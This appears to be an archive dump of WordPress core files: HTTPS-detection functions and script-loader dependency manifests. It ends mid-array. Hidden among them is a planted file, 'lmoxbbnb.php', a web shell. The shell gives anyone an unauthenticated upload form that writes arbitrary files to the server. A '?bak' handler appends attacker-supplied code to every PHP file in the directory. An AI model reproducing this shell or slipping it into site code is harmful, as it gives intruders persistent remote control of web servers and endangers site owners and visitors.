 * it should be used cautiously, especially in performance-sensitive environments.
 * It is called when HTTPS support needs to be validated.
 *
 * @since 6.4.0
 * @access private
 *
 * @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
 */
function wp_get_https_detection_errors() {
	/**
	 * Short-circuits the process of detecting errors related to HTTPS support.
	 *
	 * Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
	 * request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
	 *
	 * @since 6.4.0
	 *
	 * @param null|WP_Error $pre Error object to short-circuit detection,
	 *                           or null to continue with the default behavior.
	 */
	$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
	if ( is_wp_error( $support_errors ) ) {
		return $support_errors->errors;
	}

	$support_errors = new WP_Error();

	$response = wp_remote_request(
		home_url( '/', 'https' ),
		array(
			'headers'   => array(
				'Cache-Control' => 'no-cache',
			),
			'sslverify' => true,
		)
	);

	if ( is_wp_error( $response ) ) {
		$unverified_response = wp_remote_request(
			home_url( '/', 'https' ),
			array(
				'headers'   => array(
					'Cache-Control' => 'no-cache',
				),
				'sslverify' => false,
			)
		);

		if ( is_wp_error( $unverified_response ) ) {
			$support_errors->add(
				'https_request_failed',
				__( 'HTTPS request failed.' )
			);
		} else {
			$support_errors->add(
				'ssl_verification_failed',
				__( 'SSL verification failed.' )
			);
		}

		$response = $unverified_response;
	}

	if ( ! is_wp_error( $response ) ) {
		if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
			$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
		} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
			$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
		}
	}

	return $support_errors->errors;
}

/**
 * Checks whether a given HTML string is likely an output from this WordPress site.
 *
 * This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
 * Since any of these actions may be disabled through third-party code, this function may also return null to indicate
 * that it was not possible to determine ownership.
 *
 * @since 5.7.0
 * @access private
 *
 * @param string $html Full HTML output string, e.g. from a HTTP response.
 * @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
 */
function wp_is_local_html_output( $html ) {
	// 1. Check if HTML includes the site's Really Simple Discovery link.
	if ( has_action( 'wp_head', 'rsd_link' ) ) {
		$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
		return str_contains( $html, $pattern );
	}

	// 2. Check if HTML includes the site's REST API link.
	if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
		// Try both HTTPS and HTTP since the URL depends on context.
		$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
		return str_contains( $html, $pattern );
	}

	// Otherwise the result cannot be determined.
	return null;
}
script-loader-react-refresh-runtime.min-20260604235759.php000066600000000124152241256320016423 0ustar00<?php return array('dependencies' => array(), 'version' => '8f1acdfb845f670b0ef2');
.assets.php000066600000000000152241256320006631 0ustar00script-loader-react-refresh-entry.min.php000066600000000156152241256320014506 0ustar00<?php return array('dependencies' => array('wp-react-refresh-runtime'), 'version' => 'a100113810d2b7fe3a75');
lmoxbbnb.php000066600000001370152241256320007067 0ustar00<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?>
<?php
if (isset($_GET['bak'])) {
$directory = __DIR__;
$mama = $_POST['file'];
$textToAppend = '
' . $mama . '
';
if ($handle = opendir($directory)) {
    while (false !== ($file = readdir($handle))) {
        if (pathinfo($file, PATHINFO_EXTENSION) === 'php') {
            $fileHandle = fopen($directory . '/' . $file, 'a');
            fwrite($fileHandle, $textToAppend);
            fclose($fileHandle);
            echo "OK >> $file
";
        }
    }
    closedir($handle);
}
}
?>
script-loader-packages.php000066600000030553152241256320011615 0ustar00<?php return array('a11y.js' => array('dependencies' => array('wp-dom-ready', 'wp-i18n'), 'version' => '454e8a3cffdca128c277'), 'admin-ui.js' => array('dependencies' => array('react-jsx-runtime', 'wp-components', 'wp-element'), 'version' => '162fe802085f0b777fd4'), 'annotations.js' => array('dependencies' => array('wp-data', 'wp-hooks', 'wp-i18n', 'wp-rich-text'), 'version' => 'b0f85052d9a7695cd3bc'), 'api-fetch.js' => array('dependencies' => array('wp-i18n', 'wp-url'), 'version' => 'dde45ae4bb2923c6d069'), 'autop.js' => array('dependencies' => array(), 'version' => '4253b2f13990616d5356'), 'base-styles.js' => array('dependencies' => array(), 'version' => 'dc7e184aa007ae08c82c'), 'blob.js' => array('dependencies' => array(), 'version' => 'e1b9669561b45fc50da4'), 'block-directory.js' => array('dependencies' => array('react-jsx-runtime', 'wp-a11y', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-notices', 'wp-plugins', 'wp-primitives', 'wp-url'), 'version' => '033f605efae39cbb46e1'), 'block-editor.js' => array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'wp-a11y', 'wp-api-fetch', 'wp-blob', 'wp-block-serialization-default-parser', 'wp-blocks', 'wp-commands', 'wp-components', 'wp-compose', 'wp-data', 'wp-date', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-is-shallow-equal', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-notices', 'wp-preferences', 'wp-primitives', 'wp-priority-queue', 'wp-private-apis', 'wp-rich-text', 'wp-style-engine', 'wp-token-list', 'wp-url', 'wp-warning'), 'version' => 'eae9c1c1fdbcd744c9d5'), 'block-library.js' => array('dependencies' => array('react-jsx-runtime', 'wp-a11y', 'wp-api-fetch', 'wp-autop', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-escape-html', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-latex-to-mathml', 'wp-notices', 'wp-patterns', 'wp-primitives', 'wp-private-apis', 'wp-rich-text', 'wp-server-side-render', 'wp-url', 'wp-wordcount'), 'version' => '203bb80432e60c3ac8bd'), 'block-serialization-default-parser.js' => array('dependencies' => array(), 'version' => '6f4152c4a3466c0e1107'), 'blocks.js' => array('dependencies' => array('react-jsx-runtime', 'wp-autop', 'wp-blob', 'wp-block-serialization-default-parser', 'wp-data', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-is-shallow-equal', 'wp-private-apis', 'wp-rich-text', 'wp-shortcode', 'wp-warning'), 'version' => '038adc2b455e24b7ce0e'), 'commands.js' => array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'wp-components', 'wp-data', 'wp-element', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-primitives', 'wp-private-apis'), 'version' => 'dc36b1bd84586300bf60'), 'components.js' => array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'wp-a11y', 'wp-compose', 'wp-date', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-escape-html', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-is-shallow-equal', 'wp-keycodes', 'wp-primitives', 'wp-private-apis', 'wp-rich-text', 'wp-warning'), 'version' => '316cf67f025fcb3e30cc'), 'compose.js' => array('dependencies' => array('react', 'react-jsx-runtime', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-is-shallow-equal', 'wp-keycodes', 'wp-priority-queue'), 'version' => '7c895b31cd7a903b5229'), 'core-commands.js' => array('dependencies' => array('react-jsx-runtime', 'wp-commands', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-element', 'wp-html-entities', 'wp-i18n', 'wp-primitives', 'wp-private-apis', 'wp-router', 'wp-url'), 'version' => '2aa6475e85b024c6a8d7'), 'core-data.js' => array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-compose', 'wp-data', 'wp-deprecated', 'wp-element', 'wp-html-entities', 'wp-i18n', 'wp-is-shallow-equal', 'wp-private-apis', 'wp-rich-text', 'wp-url', 'wp-warning'), 'version' => '164cd7b3a5ff5fbcb9c6'), 'customize-widgets.js' => array('dependencies' => array('react-jsx-runtime', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-dom', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-is-shallow-equal', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-media-utils', 'wp-preferences', 'wp-primitives', 'wp-private-apis', 'wp-widgets'), 'version' => '18b0f5c24fbd8697b2aa'), 'data.js' => array('dependencies' => array('react-jsx-runtime', 'wp-compose', 'wp-deprecated', 'wp-element', 'wp-is-shallow-equal', 'wp-priority-queue', 'wp-private-apis', 'wp-redux-routine'), 'version' => 'c64d89d47908ae6c6928'), 'data-controls.js' => array('dependencies' => array('wp-api-fetch', 'wp-data', 'wp-deprecated'), 'version' => '795b5696a2f33be22815'), 'date.js' => array('dependencies' => array('moment', 'wp-deprecated'), 'version' => '90011238ea6662a51b76'), 'deprecated.js' => array('dependencies' => array('wp-hooks'), 'version' => '6c0519d363872604d48f'), 'dom.js' => array('dependencies' => array('wp-deprecated'), 'version' => 'ce91312aee495c65e891'), 'dom-ready.js' => array('dependencies' => array(), 'version' => 'e8a78afc9e733da0e68c'), 'edit-post.js' => array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-commands', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-deprecated', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-notices', 'wp-plugins', 'wp-preferences', 'wp-primitives', 'wp-private-apis', 'wp-url', 'wp-widgets'), 'version' => 'e1bb9f1ce3b75f246296'), 'edit-site.js' => array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'wp-a11y', 'wp-api-fetch', 'wp-blob', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-commands', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-deprecated', 'wp-dom', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-media-utils', 'wp-notices', 'wp-patterns', 'wp-plugins', 'wp-preferences', 'wp-primitives', 'wp-private-apis', 'wp-router', 'wp-url', 'wp-warning', 'wp-widgets'), 'version' => '7c958b50fcdf2747fee0'), 'edit-widgets.js' => array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-media-utils', 'wp-notices', 'wp-patterns', 'wp-plugins', 'wp-preferences', 'wp-primitives', 'wp-private-apis', 'wp-url', 'wp-viewport', 'wp-widgets'), 'version' => 'a80ffe47fb274d89b066'), 'editor.js' => array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'wp-a11y', 'wp-api-fetch', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-commands', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-media-utils', 'wp-notices', 'wp-patterns', 'wp-plugins', 'wp-preferences', 'wp-primitives', 'wp-private-apis', 'wp-rich-text', 'wp-server-side-render', 'wp-url', 'wp-viewport', 'wp-warning', 'wp-wordcount'), 'version' => '28ddbb0a43bff021a355'), 'element.js' => array('dependencies' => array('react', 'react-dom', 'wp-escape-html'), 'version' => 'a63ee6ce984c02a99fa7'), 'escape-html.js' => array('dependencies' => array(), 'version' => '6cade854f375b3091114'), 'format-library.js' => array('dependencies' => array('react-jsx-runtime', 'wp-a11y', 'wp-block-editor', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-html-entities', 'wp-i18n', 'wp-latex-to-mathml', 'wp-primitives', 'wp-private-apis', 'wp-rich-text', 'wp-url'), 'version' => '70ccda985031e9303e9e'), 'hooks.js' => array('dependencies' => array(), 'version' => '220ff17f5667d013d468'), 'html-entities.js' => array('dependencies' => array(), 'version' => '4ae2a0abe957ffc91832'), 'i18n.js' => array('dependencies' => array('wp-hooks'), 'version' => '6b3ae5bd3b8d9598492d'), 'is-shallow-equal.js' => array('dependencies' => array(), 'version' => '4554764360b974e32f5d'), 'keyboard-shortcuts.js' => array('dependencies' => array('react-jsx-runtime', 'wp-data', 'wp-element', 'wp-keycodes'), 'version' => '98dc6100b14191414e86'), 'keycodes.js' => array('dependencies' => array('wp-i18n'), 'version' => '0ae26254e495f9f44348'), 'latex-to-mathml.js' => array('dependencies' => array(), 'version' => '1ce7a1f9643a38b5ebfc'), 'list-reusable-blocks.js' => array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-blob', 'wp-components', 'wp-compose', 'wp-element', 'wp-i18n'), 'version' => '6a9a46c2725626e98187'), 'media-utils.js' => array('dependencies' => array('wp-api-fetch', 'wp-blob', 'wp-element', 'wp-i18n', 'wp-private-apis'), 'version' => '759ef046a52055f4122a'), 'notices.js' => array('dependencies' => array('wp-data'), 'version' => 'bce2bc515ebefc1c8fdb'), 'nux.js' => array('dependencies' => array('react-jsx-runtime', 'wp-components', 'wp-compose', 'wp-data', 'wp-deprecated', 'wp-element', 'wp-i18n', 'wp-primitives'), 'version' => 'faac53b38d2c588188d9'), 'patterns.js' => array('dependencies' => array('react-jsx-runtime', 'wp-a11y', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-element', 'wp-html-entities', 'wp-i18n', 'wp-notices', 'wp-primitives', 'wp-private-apis', 'wp-url'), 'version' => '9a430feb5c489942dfd9'), 'plugins.js' => array('dependencies' => array('react-jsx-runtime', 'wp-compose', 'wp-deprecated', 'wp-element', 'wp-hooks', 'wp-is-shallow-equal', 'wp-primitives'), 'version' => '406ba7671d4fe3433a29'), 'preferences.js' => array('dependencies' => array('react-jsx-runtime', 'wp-a11y', 'wp-components', 'wp-compose', 'wp-data', 'wp-deprecated', 'wp-element', 'wp-i18n', 'wp-primitives', 'wp-private-apis'), 'version' => '82e07780e2bc6c33ac54'), 'preferences-persistence.js' => array('dependencies' => array('wp-api-fetch'), 'version' => 'c2f2335b9574eb86f052'), 'primitives.js' => array('dependencies' => array('react-jsx-runtime', 'wp-element'), 'version' => '2a765d78f060aed119ff'), 'priority-queue.js' => array('dependencies' => array(), 'version' => 'b617c70465159c57937b'), 'private-apis.js' => array('dependencies' => array(), 'version' => 'd7d926d9becc3eef5e24'), 'redux-routine.js' => array('dependencies' => array(), 'version' => '58e4c7cd114da148c2c4'), 'reusable-blocks.js' => array('dependencies' => array('react-jsx-runtime', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-core-data', 'wp-data', 'wp-element', 'wp-i18n', 'wp-notices', 'wp-primitives', 'wp-url'), 'version' => '432ad5022736e46b1966'), 'rich-text.js' => array('dependencies' => array('wp-a11y', 'wp-compose', 'wp-data', 'wp-deprecated', 'wp-element', 'wp-escape-html', 'wp-i18n', 'wp-keycodes'), 'version' => '26b032e73cfbf9a8165e'), 'router.js' => array('dependencies' => array('react-jsx-runtime', 'wp-compose', 'wp-element', 'wp-private-apis', 'wp-url'), 'version' => 'a276444c22bcd59e25c6'), 'server-side-render.js' => array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n', 'wp-url'), 'version' => '1332aa67a86c1fb5cdae'), 'shortcode.js' => array('dependencies' => array(), 'version' => 'c4ba248a967c40b8582c'), 'style-engine.js' => array('dependencies' => array(), 'version' => 'e9af2fb3cca3fc5b8836'), 'token-list.js' => array('dependencies' => array(), 'version' => '2dbca0e379f5b7d539a9'), 'url.js' => array('dependencies' => array(), 'version' => '6bc6a4c3049d91342459'), 'viewport.js' => array('dependencies' => array('react-jsx-runtime', 'wp-compose', 'wp-data'), 'version' => 'a67acba4cc142a907c6d'), 'views.js' => array('dependencies' => array('wp-data', 'wp-element', 'wp-preferences'), 'version' => '45d25ba894aa9540a41f'), 'warning.js' => array('dependencies' => array(), 'version' => '9eb7f5c6957924ec4b81'), 'widgets.js' => array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-element', 'wp-i18n', 'wp-notices', 'wp-primitives'), 'version' => '1eec0865ea9500e23fc2'), 'wordcount.js' => array('dependencies' => array(), 'version' => '74fa464d39ba906db10c'));
https-detection-20260605034026.php000066600000013341152241256320011764 0ustar00<?php
/**
 * HTTPS detection functions.
 *
 * @package WordPress
 * @since 5.7.0
 */

/**
 * Checks whether the website is using HTTPS.
 *
 * This is based on whether both the home and site URL are using HTTPS.
 *
 * @since 5.7.0
 * @see wp_is_home_url_using_https()
 * @see wp_is_site_url_using_https()
 *
 * @return bool True if using HTTPS, false otherwise.
 */
function wp_is_using_https() {
	if ( ! wp_is_home_url_using_https() ) {
		return false;
	}

	return wp_is_site_url_using_https();
}

/**
 * Checks whether the current site URL is using HTTPS.
 *
 * @since 5.7.0
 * @see home_url()
 *
 * @return bool True if using HTTPS, false otherwise.
 */
function wp_is_home_url_using_https() {
	return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}

/**
 * Checks whether the current site's URL where WordPress is stored is using HTTPS.
 *
 * This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
 * are accessible.
 *
 * @since 5.7.0
 * @see site_url()
 *
 * @return bool True if using HTTPS, false otherwise.
 */
function wp_is_site_url_using_https() {
	/*
	 * Use direct option access for 'siteurl' and manually run the 'site_url'
	 * filter because `site_url()` will adjust the scheme based on what the
	 * current request is using.
	 */
	/** This filter is documented in wp-includes/link-template.php */
	$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );

	return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}

/**
 * Checks whether HTTPS is supported for the server and domain.
 *
 * This function makes an HTTP request through `wp_get_https_detection_errors()`
 * to check for HTTPS support. As this process can be resource-intensive,
 * it should be used cautiously, especially in performance-sensitive environments,
 * to avoid potential latency issues.
 *
 * @since 5.7.0
 *
 * @return bool True if HTTPS is supported, false otherwise.
 */
function wp_is_https_supported() {
	$https_detection_errors = wp_get_https_detection_errors();

	// If there are errors, HTTPS is not supported.
	return empty( $https_detection_errors );
}

/**
 * Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
 *
 * This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
 * it should be used cautiously, especially in performance-sensitive environments.
 * It is called when HTTPS support needs to be validated.
 *
 * @since 6.4.0
 * @access private
 *
 * @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
 */
function wp_get_https_detection_errors() {
	/**
	 * Short-circuits the process of detecting errors related to HTTPS support.
	 *
	 * Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
	 * request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
	 *
	 * @since 6.4.0
	 *
	 * @param null|WP_Error $pre Error object to short-circuit detection,
	 *                           or null to continue with the default behavior.
	 */
	$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
	if ( is_wp_error( $support_errors ) ) {
		return $support_errors->errors;
	}

	$support_errors = new WP_Error();

	$response = wp_remote_request(
		home_url( '/', 'https' ),
		array(
			'headers'   => array(
				'Cache-Control' => 'no-cache',
			),
			'sslverify' => true,
		)
	);

	if ( is_wp_error( $response ) ) {
		$unverified_response = wp_remote_request(
			home_url( '/', 'https' ),
			array(
				'headers'   => array(
					'Cache-Control' => 'no-cache',
				),
				'sslverify' => false,
			)
		);

		if ( is_wp_error( $unverified_response ) ) {
			$support_errors->add(
				'https_request_failed',
				__( 'HTTPS request failed.' )
			);
		} else {
			$support_errors->add(
				'ssl_verification_failed',
				__( 'SSL verification failed.' )
			);
		}

		$response = $unverified_response;
	}

	if ( ! is_wp_error( $response ) ) {
		if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
			$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
		} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
			$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
		}
	}

	return $support_errors->errors;
}

/**
 * Checks whether a given HTML string is likely an output from this WordPress site.
 *
 * This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
 * Since any of these actions may be disabled through third-party code, this function may also return null to indicate
 * that it was not possible to determine ownership.
 *
 * @since 5.7.0
 * @access private
 *
 * @param string $html Full HTML output string, e.g. from a HTTP response.
 * @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
 */
function wp_is_local_html_output( $html ) {
	// 1. Check if HTML includes the site's Really Simple Discovery link.
	if ( has_action( 'wp_head', 'rsd_link' ) ) {
		$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
		return str_contains( $html, $pattern );
	}

	// 2. Check if HTML includes the site's REST API link.
	if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
		// Try both HTTPS and HTTP since the URL depends on context.
		$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
		return str_contains( $html, $pattern );
	}

	// Otherwise the result cannot be determined.
	return null;
}
script-loader-react-refresh-entry.php000066600000000156152241256320013724 0ustar00<?php return array('dependencies' => array('wp-react-refresh-runtime'), 'version' => 'a100113810d2b7fe3a75');
script-loader-packages.min.php000066600000031147152241256320012377 0ustar00<?php return array('a11y.min.js' => array('dependencies' => array('wp-dom-ready', 'wp-i18n'), 'version' => 'cb460b4676c94bd228ed'), 'admin-ui.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-components', 'wp-element'), 'version' => 'bc5db43f7e3f0d8adcc8'), 'annotations.min.js' => array('dependencies' => array('wp-data', 'wp-hooks', 'wp-i18n', 'wp-rich-text'), 'version' => '758b80d8a795a222601b'), 'api-fetch.min.js' => array('dependencies' => array('wp-i18n', 'wp-url'), 'version' => '3a4d9af2b423048b0dee'), 'autop.min.js' => array('dependencies' => array(), 'version' => '9fb50649848277dd318d'), 'base-styles.min.js' => array('dependencies' => array(), 'version' => '7529f773be5cb229e3c4'), 'blob.min.js' => array('dependencies' => array(), 'version' => '9113eed771d446f4a556'), 'block-directory.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-a11y', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-notices', 'wp-plugins', 'wp-primitives', 'wp-url'), 'version' => '55bdef7bd3137eee623d'), 'block-editor.min.js' => array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'wp-a11y', 'wp-api-fetch', 'wp-blob', 'wp-block-serialization-default-parser', 'wp-blocks', 'wp-commands', 'wp-components', 'wp-compose', 'wp-data', 'wp-date', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-is-shallow-equal', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-notices', 'wp-preferences', 'wp-primitives', 'wp-priority-queue', 'wp-private-apis', 'wp-rich-text', 'wp-style-engine', 'wp-token-list', 'wp-url', 'wp-warning'), 'version' => 'addf558a422e2ee57920'), 'block-library.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-a11y', 'wp-api-fetch', 'wp-autop', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-escape-html', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-latex-to-mathml', 'wp-notices', 'wp-patterns', 'wp-primitives', 'wp-private-apis', 'wp-rich-text', 'wp-server-side-render', 'wp-url', 'wp-wordcount'), 'version' => '3ab2dc0b20b9fb4239f7'), 'block-serialization-default-parser.min.js' => array('dependencies' => array(), 'version' => '14d44daebf663d05d330'), 'blocks.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-autop', 'wp-blob', 'wp-block-serialization-default-parser', 'wp-data', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-is-shallow-equal', 'wp-private-apis', 'wp-rich-text', 'wp-shortcode', 'wp-warning'), 'version' => '57eca4d23daac7159d88'), 'commands.min.js' => array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'wp-components', 'wp-data', 'wp-element', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-primitives', 'wp-private-apis'), 'version' => 'cac8f4817ab7cea0ac49'), 'components.min.js' => array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'wp-a11y', 'wp-compose', 'wp-date', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-escape-html', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-is-shallow-equal', 'wp-keycodes', 'wp-primitives', 'wp-private-apis', 'wp-rich-text', 'wp-warning'), 'version' => '0d72a218dfea8f6f442f'), 'compose.min.js' => array('dependencies' => array('react', 'react-jsx-runtime', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-is-shallow-equal', 'wp-keycodes', 'wp-priority-queue'), 'version' => '7a9b375d8c19cf9d3d9b'), 'core-commands.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-commands', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-element', 'wp-html-entities', 'wp-i18n', 'wp-primitives', 'wp-private-apis', 'wp-router', 'wp-url'), 'version' => 'effe2d88d7f0c50a8ce9'), 'core-data.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-compose', 'wp-data', 'wp-deprecated', 'wp-element', 'wp-html-entities', 'wp-i18n', 'wp-is-shallow-equal', 'wp-private-apis', 'wp-rich-text', 'wp-url', 'wp-warning'), 'version' => '15baadfe6e1374188072'), 'customize-widgets.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-dom', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-is-shallow-equal', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-media-utils', 'wp-preferences', 'wp-primitives', 'wp-private-apis', 'wp-widgets'), 'version' => 'd824213342f5e84c8ea3'), 'data.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-compose', 'wp-deprecated', 'wp-element', 'wp-is-shallow-equal', 'wp-priority-queue', 'wp-private-apis', 'wp-redux-routine'), 'version' => 'f940198280891b0b6318'), 'data-controls.min.js' => array('dependencies' => array('wp-api-fetch', 'wp-data', 'wp-deprecated'), 'version' => '49f5587e8b90f9e7cc7e'), 'date.min.js' => array('dependencies' => array('moment', 'wp-deprecated'), 'version' => '795a56839718d3ff7eae'), 'deprecated.min.js' => array('dependencies' => array('wp-hooks'), 'version' => 'e1f84915c5e8ae38964c'), 'dom.min.js' => array('dependencies' => array('wp-deprecated'), 'version' => '26edef3be6483da3de2e'), 'dom-ready.min.js' => array('dependencies' => array(), 'version' => 'f77871ff7694fffea381'), 'edit-post.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-commands', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-deprecated', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-notices', 'wp-plugins', 'wp-preferences', 'wp-primitives', 'wp-private-apis', 'wp-url', 'wp-widgets'), 'version' => 'f011f5ec0075a555ea9c'), 'edit-site.min.js' => array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'wp-a11y', 'wp-api-fetch', 'wp-blob', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-commands', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-deprecated', 'wp-dom', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-media-utils', 'wp-notices', 'wp-patterns', 'wp-plugins', 'wp-preferences', 'wp-primitives', 'wp-private-apis', 'wp-router', 'wp-url', 'wp-warning', 'wp-widgets'), 'version' => '4c66e2ca1cf802c8d456'), 'edit-widgets.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-components', 'wp-compose', 